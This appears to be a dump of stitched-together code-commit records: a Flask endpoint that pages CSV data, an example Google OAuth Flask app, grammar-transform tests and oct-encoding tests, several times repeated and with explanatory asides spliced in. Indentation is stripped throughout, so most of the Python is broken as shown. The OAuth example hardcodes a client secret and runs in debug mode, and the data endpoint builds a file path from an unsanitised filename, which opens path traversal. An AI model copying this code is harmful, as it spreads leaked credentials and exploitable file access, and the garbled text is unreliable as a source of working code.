data = get_data(config.UPLOAD_FOLDER + '/' + filename)
saved_data[filename] = data
response = data_pb2.SegmentedTimelineDataResponse()
        response.data.extend(list(data.values())[(page * per_page):(page * per_page + per_page)])
return MessageToDict(response)
def add_data(segment, date, inventory):
timestamp = Timestamp()
timestamp.FromDatetime(datetime.strptime(date, '%Y-%m-%d'))
segment.dates.append(timestamp)
segment.inventory_volumes.append(int(inventory))
def get_data(filename):
segments_to_data = {}
with open(filename) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
cursor = iter(csv_reader)
# in order to skip the first line
next(cursor)
for row in cursor:
if (row[1], row[2]) not in segments_to_data:
segments_to_data[(row[1], row[2])] = data_pb2.SegmentData(country=row[1], device=row[2])
add_data(segments_to_data[(row[1], row[2])], row[0], row[3])
return segments_to_data
|
Create Data resource for sending data from the server
from google.protobuf.json_format import MessageToDict
from grpc.messages import data_pb2
import config
from flask_restful import Resource
from flask import request, Flask
import csv
from google.protobuf.timestamp_pb2 import Timestamp
from datetime import datetime
saved_data = {}
app = Flask(__name__)
class Data(Resource):
def get(self, filename):
page = int(request.args.get('page')) if request.args.get('page') else 0
per_page = int(request.args.get('per_page')) if request.args.get('per_page') else config.per_page
if filename in saved_data:
data = saved_data[filename]
else:
data = get_data(config.UPLOAD_FOLDER + '/' + filename)
saved_data[filename] = data
response = data_pb2.SegmentedTimelineDataResponse()
        response.data.extend(list(data.values())[(page * per_page):(page * per_page + per_page)])
return MessageToDict(response)
def add_data(segment, date, inventory):
timestamp = Timestamp()
timestamp.FromDatetime(datetime.strptime(date, '%Y-%m-%d'))
segment.dates.append(timestamp)
segment.inventory_volumes.append(int(inventory))
def get_data(filename):
segments_to_data = {}
with open(filename) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
cursor = iter(csv_reader)
# in order to skip the first line
next(cursor)
for row in cursor:
if (row[1], row[2]) not in segments_to_data:
segments_to_data[(row[1], row[2])] = data_pb2.SegmentData(country=row[1], device=row[2])
add_data(segments_to_data[(row[1], row[2])], row[0], row[3])
return segments_to_data
|
<commit_before><commit_msg>Create Data resource for sending data from the server<commit_after>from google.protobuf.json_format import MessageToDict
from grpc.messages import data_pb2
import config
from flask_restful import Resource
from flask import request, Flask
import csv
from google.protobuf.timestamp_pb2 import Timestamp
from datetime import datetime
saved_data = {}
app = Flask(__name__)
class Data(Resource):
def get(self, filename):
page = int(request.args.get('page')) if request.args.get('page') else 0
per_page = int(request.args.get('per_page')) if request.args.get('per_page') else config.per_page
if filename in saved_data:
data = saved_data[filename]
else:
data = get_data(config.UPLOAD_FOLDER + '/' + filename)
saved_data[filename] = data
response = data_pb2.SegmentedTimelineDataResponse()
        response.data.extend(list(data.values())[(page * per_page):(page * per_page + per_page)])
return MessageToDict(response)
def add_data(segment, date, inventory):
timestamp = Timestamp()
timestamp.FromDatetime(datetime.strptime(date, '%Y-%m-%d'))
segment.dates.append(timestamp)
segment.inventory_volumes.append(int(inventory))
def get_data(filename):
segments_to_data = {}
with open(filename) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
cursor = iter(csv_reader)
# in order to skip the first line
next(cursor)
for row in cursor:
if (row[1], row[2]) not in segments_to_data:
segments_to_data[(row[1], row[2])] = data_pb2.SegmentData(country=row[1], device=row[2])
add_data(segments_to_data[(row[1], row[2])], row[0], row[3])
return segments_to_data
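As a side note on the paging slice used in Data.get above (note the list() wrapper, since dict.values() is not subscriptable on Python 3), here is the same windowing logic as a minimal standalone sketch; the function name is hypothetical, purely for illustration:

def page_slice(items, page, per_page):
    # Page 0 yields items[0:per_page], page 1 yields items[per_page:2*per_page], ...
    start = page * per_page
    return items[start:start + per_page]

print(page_slice(list(range(10)), page=1, per_page=3))  # [3, 4, 5]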
|
|
21820105c0986cf24b294ef26e70feac81caba5b
|
examples/web_flask.py
|
examples/web_flask.py
|
#!/usr/bin/env python3
# Install dependencies with:
# pip install flask requests requests_oauth2
import os
import logging
import requests
from requests_oauth2.services import GoogleClient
from requests_oauth2 import OAuth2BearerToken
from flask import Flask, request, redirect, session
app = Flask(__name__)
app.secret_key = os.environ.get("SECRET_KEY") or os.urandom(20)
google_auth = GoogleClient(
client_id=("554229061086-np1qvffgq6gi1f6njg99qkeqt4h2gaut"
".apps.googleusercontent.com"),
client_secret="XqTsoS6DXq-W0KgTqvQISBOM",
redirect_uri="http://localhost:5000/google/oauth2callback",
)
@app.route("/")
def index():
return redirect("/google/")
@app.route("/google/")
def google_index():
if not session.get("access_token"):
return redirect("/google/oauth2callback")
with requests.Session() as s:
s.auth = OAuth2BearerToken(session["access_token"])
r = s.get("https://www.googleapis.com/plus/v1/people/me")
r.raise_for_status()
data = r.json()
return "Hello, {}!".format(data["displayName"])
@app.route("/google/oauth2callback")
def google_oauth2callback():
code = request.args.get("code")
error = request.args.get("error")
if error:
return "error :( {!r}".format(error)
if not code:
return redirect(google_auth.authorize_url(
scope=["profile", "email"],
response_type="code",
))
data = google_auth.get_token(
code=code,
grant_type="authorization_code",
)
session["access_token"] = data.get("access_token")
return redirect("/")
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
app.run(debug=True)
|
Add an example Flask app
|
Add an example Flask app
|
Python
|
bsd-3-clause
|
maraujop/requests-oauth2
|
Add an example Flask app
|
#!/usr/bin/env python3
# Install dependencies with:
# pip install flask requests requests_oauth2
import os
import logging
import requests
from requests_oauth2.services import GoogleClient
from requests_oauth2 import OAuth2BearerToken
from flask import Flask, request, redirect, session
app = Flask(__name__)
app.secret_key = os.environ.get("SECRET_KEY") or os.urandom(20)
google_auth = GoogleClient(
client_id=("554229061086-np1qvffgq6gi1f6njg99qkeqt4h2gaut"
".apps.googleusercontent.com"),
client_secret="XqTsoS6DXq-W0KgTqvQISBOM",
redirect_uri="http://localhost:5000/google/oauth2callback",
)
@app.route("/")
def index():
return redirect("/google/")
@app.route("/google/")
def google_index():
if not session.get("access_token"):
return redirect("/google/oauth2callback")
with requests.Session() as s:
s.auth = OAuth2BearerToken(session["access_token"])
r = s.get("https://www.googleapis.com/plus/v1/people/me")
r.raise_for_status()
data = r.json()
return "Hello, {}!".format(data["displayName"])
@app.route("/google/oauth2callback")
def google_oauth2callback():
code = request.args.get("code")
error = request.args.get("error")
if error:
return "error :( {!r}".format(error)
if not code:
return redirect(google_auth.authorize_url(
scope=["profile", "email"],
response_type="code",
))
data = google_auth.get_token(
code=code,
grant_type="authorization_code",
)
session["access_token"] = data.get("access_token")
return redirect("/")
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
app.run(debug=True)
|
<commit_before><commit_msg>Add an example Flask app<commit_after>
|
#!/usr/bin/env python3
# Install dependencies with:
# pip install flask requests requests_oauth2
import os
import logging
import requests
from requests_oauth2.services import GoogleClient
from requests_oauth2 import OAuth2BearerToken
from flask import Flask, request, redirect, session
app = Flask(__name__)
app.secret_key = os.environ.get("SECRET_KEY") or os.urandom(20)
google_auth = GoogleClient(
client_id=("554229061086-np1qvffgq6gi1f6njg99qkeqt4h2gaut"
".apps.googleusercontent.com"),
client_secret="XqTsoS6DXq-W0KgTqvQISBOM",
redirect_uri="http://localhost:5000/google/oauth2callback",
)
@app.route("/")
def index():
return redirect("/google/")
@app.route("/google/")
def google_index():
if not session.get("access_token"):
return redirect("/google/oauth2callback")
with requests.Session() as s:
s.auth = OAuth2BearerToken(session["access_token"])
r = s.get("https://www.googleapis.com/plus/v1/people/me")
r.raise_for_status()
data = r.json()
return "Hello, {}!".format(data["displayName"])
@app.route("/google/oauth2callback")
def google_oauth2callback():
code = request.args.get("code")
error = request.args.get("error")
if error:
return "error :( {!r}".format(error)
if not code:
return redirect(google_auth.authorize_url(
scope=["profile", "email"],
response_type="code",
))
data = google_auth.get_token(
code=code,
grant_type="authorization_code",
)
session["access_token"] = data.get("access_token")
return redirect("/")
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
app.run(debug=True)
|
Add an example Flask app
#!/usr/bin/env python3
# Install dependencies with:
# pip install flask requests requests_oauth2
import os
import logging
import requests
from requests_oauth2.services import GoogleClient
from requests_oauth2 import OAuth2BearerToken
from flask import Flask, request, redirect, session
app = Flask(__name__)
app.secret_key = os.environ.get("SECRET_KEY") or os.urandom(20)
google_auth = GoogleClient(
client_id=("554229061086-np1qvffgq6gi1f6njg99qkeqt4h2gaut"
".apps.googleusercontent.com"),
client_secret="XqTsoS6DXq-W0KgTqvQISBOM",
redirect_uri="http://localhost:5000/google/oauth2callback",
)
@app.route("/")
def index():
return redirect("/google/")
@app.route("/google/")
def google_index():
if not session.get("access_token"):
return redirect("/google/oauth2callback")
with requests.Session() as s:
s.auth = OAuth2BearerToken(session["access_token"])
r = s.get("https://www.googleapis.com/plus/v1/people/me")
r.raise_for_status()
data = r.json()
return "Hello, {}!".format(data["displayName"])
@app.route("/google/oauth2callback")
def google_oauth2callback():
code = request.args.get("code")
error = request.args.get("error")
if error:
return "error :( {!r}".format(error)
if not code:
return redirect(google_auth.authorize_url(
scope=["profile", "email"],
response_type="code",
))
data = google_auth.get_token(
code=code,
grant_type="authorization_code",
)
session["access_token"] = data.get("access_token")
return redirect("/")
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
app.run(debug=True)
|
<commit_before><commit_msg>Add an example Flask app<commit_after>#!/usr/bin/env python3
# Install dependencies with:
# pip install flask requests requests_oauth2
import os
import logging
import requests
from requests_oauth2.services import GoogleClient
from requests_oauth2 import OAuth2BearerToken
from flask import Flask, request, redirect, session
app = Flask(__name__)
app.secret_key = os.environ.get("SECRET_KEY") or os.urandom(20)
google_auth = GoogleClient(
client_id=("554229061086-np1qvffgq6gi1f6njg99qkeqt4h2gaut"
".apps.googleusercontent.com"),
client_secret="XqTsoS6DXq-W0KgTqvQISBOM",
redirect_uri="http://localhost:5000/google/oauth2callback",
)
@app.route("/")
def index():
return redirect("/google/")
@app.route("/google/")
def google_index():
if not session.get("access_token"):
return redirect("/google/oauth2callback")
with requests.Session() as s:
s.auth = OAuth2BearerToken(session["access_token"])
r = s.get("https://www.googleapis.com/plus/v1/people/me")
r.raise_for_status()
data = r.json()
return "Hello, {}!".format(data["displayName"])
@app.route("/google/oauth2callback")
def google_oauth2callback():
code = request.args.get("code")
error = request.args.get("error")
if error:
return "error :( {!r}".format(error)
if not code:
return redirect(google_auth.authorize_url(
scope=["profile", "email"],
response_type="code",
))
data = google_auth.get_token(
code=code,
grant_type="authorization_code",
)
session["access_token"] = data.get("access_token")
return redirect("/")
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
app.run(debug=True)
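For readers unfamiliar with bearer-token auth hooks: a rough sketch of what a helper like OAuth2BearerToken amounts to, written against the documented requests AuthBase protocol. This illustrates the mechanism and is not the requests_oauth2 library's actual implementation:

import requests

class BearerAuth(requests.auth.AuthBase):
    """Attach an OAuth2 bearer token to every outgoing request."""
    def __init__(self, token):
        self.token = token
    def __call__(self, r):
        # Per RFC 6750, the access token travels in the Authorization header.
        r.headers['Authorization'] = 'Bearer {}'.format(self.token)
        return r

# Usage mirrors the session setup above:
# s = requests.Session(); s.auth = BearerAuth(session['access_token'])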
|
|
33ddbe6adc266bfaaf1b89c5780a94a325d51277
|
tests/UselessSymbolsRemove/EpsilonTest.py
|
tests/UselessSymbolsRemove/EpsilonTest.py
|
#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 19.08.2017 16:34
:Licence GNUv3
Part of grammpy-transforms
"""
from unittest import TestCase, main
from grammpy import *
from grammpy_transforms import *
class S(Nonterminal): pass
class A(Nonterminal): pass
class B(Nonterminal): pass
class C(Nonterminal): pass
class D(Nonterminal): pass
class Rules(Rule):
rules = [
([S], [0, S]),
([S], [1, D]),
([S], [EPS]),
([A], [0, C, B]),
([A], [0, A, D]),
([B], [1, B]),
([B], [1, 1, 0]),
([C], [1, C, C]),
([C], [0, A, 1, B]),
([D], [1, 1, A]),
([D], [0, D, 0, 0]),
([D], [1, S]),
([D], [EPS])]
class SimpleTest(TestCase):
def test_epsilonTest(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
com = ContextFree.remove_useless_symbols(g)
self.assertTrue(com.have_term([0, 1]))
self.assertTrue(com.have_nonterm([S, B, D]))
self.assertFalse(com.have_nonterm(A))
self.assertFalse(com.have_nonterm(C))
self.assertEqual(com.rules_count(), 8)
def test_epsilonTestShouldNotChange(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
ContextFree.remove_useless_symbols(g)
self.assertTrue(g.have_term([0, 1]))
self.assertTrue(g.have_nonterm([S, A, B, C, D]))
self.assertEqual(g.rules_count(), 13)
def test_epsilonTestShouldChange(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
ContextFree.remove_useless_symbols(g, transform_grammar=True)
self.assertTrue(g.have_term([0, 1]))
self.assertTrue(g.have_nonterm([S, B, D]))
self.assertFalse(g.have_nonterm(A))
self.assertFalse(g.have_nonterm(C))
self.assertEqual(g.rules_count(), 8)
if __name__ == '__main__':
main()
|
Add test with epsilon rules
|
Add test with epsilon rules
|
Python
|
mit
|
PatrikValkovic/grammpy
|
Add test with epsilon rules
|
#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 19.08.2017 16:34
:Licence GNUv3
Part of grammpy-transforms
"""
from unittest import TestCase, main
from grammpy import *
from grammpy_transforms import *
class S(Nonterminal): pass
class A(Nonterminal): pass
class B(Nonterminal): pass
class C(Nonterminal): pass
class D(Nonterminal): pass
class Rules(Rule):
rules = [
([S], [0, S]),
([S], [1, D]),
([S], [EPS]),
([A], [0, C, B]),
([A], [0, A, D]),
([B], [1, B]),
([B], [1, 1, 0]),
([C], [1, C, C]),
([C], [0, A, 1, B]),
([D], [1, 1, A]),
([D], [0, D, 0, 0]),
([D], [1, S]),
([D], [EPS])]
class SimpleTest(TestCase):
def test_epsilonTest(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
com = ContextFree.remove_useless_symbols(g)
self.assertTrue(com.have_term([0, 1]))
self.assertTrue(com.have_nonterm([S, B, D]))
self.assertFalse(com.have_nonterm(A))
self.assertFalse(com.have_nonterm(C))
self.assertEqual(com.rules_count(), 8)
def test_epsilonTestShouldNotChange(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
ContextFree.remove_useless_symbols(g)
self.assertTrue(g.have_term([0, 1]))
self.assertTrue(g.have_nonterm([S, A, B, C, D]))
self.assertEqual(g.rules_count(), 13)
def test_epsilonTestShouldChange(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
ContextFree.remove_useless_symbols(g, transform_grammar=True)
self.assertTrue(g.have_term([0, 1]))
self.assertTrue(g.have_nonterm([S, B, D]))
self.assertFalse(g.have_nonterm(A))
self.assertFalse(g.have_nonterm(C))
self.assertEqual(g.rules_count(), 8)
if __name__ == '__main__':
main()
|
<commit_before><commit_msg>Add test with epsilon rules<commit_after>
|
#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 19.08.2017 16:34
:Licence GNUv3
Part of grammpy-transforms
"""
from unittest import TestCase, main
from grammpy import *
from grammpy_transforms import *
class S(Nonterminal): pass
class A(Nonterminal): pass
class B(Nonterminal): pass
class C(Nonterminal): pass
class D(Nonterminal): pass
class Rules(Rule):
rules = [
([S], [0, S]),
([S], [1, D]),
([S], [EPS]),
([A], [0, C, B]),
([A], [0, A, D]),
([B], [1, B]),
([B], [1, 1, 0]),
([C], [1, C, C]),
([C], [0, A, 1, B]),
([D], [1, 1, A]),
([D], [0, D, 0, 0]),
([D], [1, S]),
([D], [EPS])]
class SimpleTest(TestCase):
def test_epsilonTest(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
com = ContextFree.remove_useless_symbols(g)
self.assertTrue(com.have_term([0, 1]))
self.assertTrue(com.have_nonterm([S, B, D]))
self.assertFalse(com.have_nonterm(A))
self.assertFalse(com.have_nonterm(C))
self.assertEqual(com.rules_count(), 8)
def test_epsilonTestShouldNotChange(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
ContextFree.remove_useless_symbols(g)
self.assertTrue(g.have_term([0, 1]))
self.assertTrue(g.have_nonterm([S, A, B, C, D]))
self.assertEqual(g.rules_count(), 13)
def test_epsilonTestShouldChange(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
ContextFree.remove_useless_symbols(g, transform_grammar=True)
self.assertTrue(g.have_term([0, 1]))
self.assertTrue(g.have_nonterm([S, B, D]))
self.assertFalse(g.have_nonterm(A))
self.assertFalse(g.have_nonterm(C))
self.assertEqual(g.rules_count(), 8)
if __name__ == '__main__':
main()
|
Add test with epsilon rules
#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 19.08.2017 16:34
:Licence GNUv3
Part of grammpy-transforms
"""
from unittest import TestCase, main
from grammpy import *
from grammpy_transforms import *
class S(Nonterminal): pass
class A(Nonterminal): pass
class B(Nonterminal): pass
class C(Nonterminal): pass
class D(Nonterminal): pass
class Rules(Rule):
rules = [
([S], [0, S]),
([S], [1, D]),
([S], [EPS]),
([A], [0, C, B]),
([A], [0, A, D]),
([B], [1, B]),
([B], [1, 1, 0]),
([C], [1, C, C]),
([C], [0, A, 1, B]),
([D], [1, 1, A]),
([D], [0, D, 0, 0]),
([D], [1, S]),
([D], [EPS])]
class SimpleTest(TestCase):
def test_epsilonTest(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
com = ContextFree.remove_useless_symbols(g)
self.assertTrue(com.have_term([0, 1]))
self.assertTrue(com.have_nonterm([S, B, D]))
self.assertFalse(com.have_nonterm(A))
self.assertFalse(com.have_nonterm(C))
self.assertEqual(com.rules_count(), 8)
def test_epsilonTestShouldNotChange(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
ContextFree.remove_useless_symbols(g)
self.assertTrue(g.have_term([0, 1]))
self.assertTrue(g.have_nonterm([S, A, B, C, D]))
self.assertEqual(g.rules_count(), 13)
def test_epsilonTestShouldChange(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
ContextFree.remove_useless_symbols(g, transform_grammar=True)
self.assertTrue(g.have_term([0, 1]))
self.assertTrue(g.have_nonterm([S, B, D]))
self.assertFalse(g.have_nonterm(A))
self.assertFalse(g.have_nonterm(C))
self.assertEqual(g.rules_count(), 8)
if __name__ == '__main__':
main()
|
<commit_before><commit_msg>Add test with epsilon rules<commit_after>#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 19.08.2017 16:34
:Licence GNUv3
Part of grammpy-transforms
"""
from unittest import TestCase, main
from grammpy import *
from grammpy_transforms import *
class S(Nonterminal): pass
class A(Nonterminal): pass
class B(Nonterminal): pass
class C(Nonterminal): pass
class D(Nonterminal): pass
class Rules(Rule):
rules = [
([S], [0, S]),
([S], [1, D]),
([S], [EPS]),
([A], [0, C, B]),
([A], [0, A, D]),
([B], [1, B]),
([B], [1, 1, 0]),
([C], [1, C, C]),
([C], [0, A, 1, B]),
([D], [1, 1, A]),
([D], [0, D, 0, 0]),
([D], [1, S]),
([D], [EPS])]
class SimpleTest(TestCase):
def test_epsilonTest(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
com = ContextFree.remove_useless_symbols(g)
self.assertTrue(com.have_term([0, 1]))
self.assertTrue(com.have_nonterm([S, B, D]))
self.assertFalse(com.have_nonterm(A))
self.assertFalse(com.have_nonterm(C))
self.assertEqual(com.rules_count(), 8)
def test_epsilonTestShouldNotChange(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
ContextFree.remove_useless_symbols(g)
self.assertTrue(g.have_term([0, 1]))
self.assertTrue(g.have_nonterm([S, A, B, C, D]))
self.assertEqual(g.rules_count(), 13)
def test_epsilonTestShouldChange(self):
g = Grammar(terminals=[0, 1],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
self.assertEqual(g.rules_count(), 13)
ContextFree.remove_useless_symbols(g, transform_grammar=True)
self.assertTrue(g.have_term([0, 1]))
self.assertTrue(g.have_nonterm([S, B, D]))
self.assertFalse(g.have_nonterm(A))
self.assertFalse(g.have_nonterm(C))
self.assertEqual(g.rules_count(), 8)
if __name__ == '__main__':
main()
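For intuition on why A and C disappear in these tests: a nonterminal survives useless-symbol removal only if it is generating (derives some terminal string) and reachable from the start symbol. A and C only ever derive strings containing each other, so neither is generating. A minimal fixed-point sketch over a toy encoding of the same rules follows; the dict representation is hypothetical, not the grammpy API (ints stand for terminals, epsilon is the empty list):

rules = {
    'S': [[0, 'S'], [1, 'D'], []],
    'A': [[0, 'C', 'B'], [0, 'A', 'D']],
    'B': [[1, 'B'], [1, 1, 0]],
    'C': [[1, 'C', 'C'], [0, 'A', 1, 'B']],
    'D': [[1, 1, 'A'], [0, 'D', 0, 0], [1, 'S'], []],
}
generating = set()
changed = True
while changed:
    # Fixed point: lhs is generating once some body uses only
    # terminals and already-generating nonterminals.
    changed = False
    for lhs, bodies in rules.items():
        if lhs not in generating and any(
                all(isinstance(s, int) or s in generating for s in body)
                for body in bodies):
            generating.add(lhs)
            changed = True
print(sorted(generating))  # ['B', 'D', 'S'] -- A and C are dropped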
|
|
a2ebaa051573e72470da241b341d82a89316a796
|
tests/test_utils.py
|
tests/test_utils.py
|
# -*- coding: utf-8 -*-
import unittest
from quantized_mesh_tile.utils import octDecode, octEncode
class TestUtils(unittest.TestCase):
def testOctDecode(self):
vec3 = octDecode(0, 0)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(255, 255)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(255, 0)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(0, 255)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
def testOctDecodeErrors(self):
with self.assertRaises(ValueError):
octDecode(-1, 0)
with self.assertRaises(ValueError):
octDecode(0, -1)
with self.assertRaises(ValueError):
octDecode(256, 0)
with self.assertRaises(ValueError):
octDecode(0, 256)
def testOctEncode(self):
vec2 = octEncode([0.0, 0.0, -1.0])
self.assertEqual(vec2[0], 255)
self.assertEqual(vec2[1], 255)
vec2 = octEncode([0.0, 0.0, 1.0])
self.assertEqual(vec2[0], 128)
self.assertEqual(vec2[1], 128)
def testOctEncodeErrors(self):
with self.assertRaises(ValueError):
octEncode([2.0, 0.0, 0.0])
with self.assertRaises(ValueError):
octEncode([0.0, 0.0, 0.0])
|
Add tests for oct enc/dec
|
Add tests for oct enc/dec
|
Python
|
mit
|
loicgasser/quantized-mesh-tile
|
Add tests for oct enc/dec
|
# -*- coding: utf-8 -*-
import unittest
from quantized_mesh_tile.utils import octDecode, octEncode
class TestUtils(unittest.TestCase):
def testOctDecode(self):
vec3 = octDecode(0, 0)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(255, 255)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(255, 0)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(0, 255)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
def testOctDecodeErrors(self):
with self.assertRaises(ValueError):
octDecode(-1, 0)
with self.assertRaises(ValueError):
octDecode(0, -1)
with self.assertRaises(ValueError):
octDecode(256, 0)
with self.assertRaises(ValueError):
octDecode(0, 256)
def testOctEncode(self):
vec2 = octEncode([0.0, 0.0, -1.0])
self.assertEqual(vec2[0], 255)
self.assertEqual(vec2[1], 255)
vec2 = octEncode([0.0, 0.0, 1.0])
self.assertEqual(vec2[0], 128)
self.assertEqual(vec2[1], 128)
def testOctEncodeErrors(self):
with self.assertRaises(ValueError):
octEncode([2.0, 0.0, 0.0])
with self.assertRaises(ValueError):
octEncode([0.0, 0.0, 0.0])
|
<commit_before><commit_msg>Add tests for oct enc/dec<commit_after>
|
# -*- coding: utf-8 -*-
import unittest
from quantized_mesh_tile.utils import octDecode, octEncode
class TestUtils(unittest.TestCase):
def testOctDecode(self):
vec3 = octDecode(0, 0)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(255, 255)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(255, 0)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(0, 255)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
def testOctDecodeErrors(self):
with self.assertRaises(ValueError):
octDecode(-1, 0)
with self.assertRaises(ValueError):
octDecode(0, -1)
with self.assertRaises(ValueError):
octDecode(256, 0)
with self.assertRaises(ValueError):
octDecode(0, 256)
def testOctEncode(self):
vec2 = octEncode([0.0, 0.0, -1.0])
self.assertEqual(vec2[0], 255)
self.assertEqual(vec2[1], 255)
vec2 = octEncode([0.0, 0.0, 1.0])
self.assertEqual(vec2[0], 128)
self.assertEqual(vec2[1], 128)
def testOctEncodeErrors(self):
with self.assertRaises(ValueError):
octEncode([2.0, 0.0, 0.0])
with self.assertRaises(ValueError):
octEncode([0.0, 0.0, 0.0])
|
Add tests for oct enc/dec
# -*- coding: utf-8 -*-
import unittest
from quantized_mesh_tile.utils import octDecode, octEncode
class TestUtils(unittest.TestCase):
def testOctDecode(self):
vec3 = octDecode(0, 0)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(255, 255)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(255, 0)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(0, 255)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
def testOctDecodeErrors(self):
with self.assertRaises(ValueError):
octDecode(-1, 0)
with self.assertRaises(ValueError):
octDecode(0, -1)
with self.assertRaises(ValueError):
octDecode(256, 0)
with self.assertRaises(ValueError):
octDecode(0, 256)
def testOctEncode(self):
vec2 = octEncode([0.0, 0.0, -1.0])
self.assertEqual(vec2[0], 255)
self.assertEqual(vec2[1], 255)
vec2 = octEncode([0.0, 0.0, 1.0])
self.assertEqual(vec2[0], 128)
self.assertEqual(vec2[1], 128)
def testOctEncodeErrors(self):
with self.assertRaises(ValueError):
octEncode([2.0, 0.0, 0.0])
with self.assertRaises(ValueError):
octEncode([0.0, 0.0, 0.0])
|
<commit_before><commit_msg>Add tests for oct enc/dec<commit_after># -*- coding: utf-8 -*-
import unittest
from quantized_mesh_tile.utils import octDecode, octEncode
class TestUtils(unittest.TestCase):
def testOctDecode(self):
vec3 = octDecode(0, 0)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(255, 255)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(255, 0)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
vec3 = octDecode(0, 255)
self.assertEqual(vec3[0], 0.0)
self.assertEqual(vec3[1], 0.0)
self.assertEqual(vec3[2], -1.0)
def testOctDecodeErrors(self):
with self.assertRaises(ValueError):
octDecode(-1, 0)
with self.assertRaises(ValueError):
octDecode(0, -1)
with self.assertRaises(ValueError):
octDecode(256, 0)
with self.assertRaises(ValueError):
octDecode(0, 256)
def testOctEncode(self):
vec2 = octEncode([0.0, 0.0, -1.0])
self.assertEqual(vec2[0], 255)
self.assertEqual(vec2[1], 255)
vec2 = octEncode([0.0, 0.0, 1.0])
self.assertEqual(vec2[0], 128)
self.assertEqual(vec2[1], 128)
def testOctEncodeErrors(self):
with self.assertRaises(ValueError):
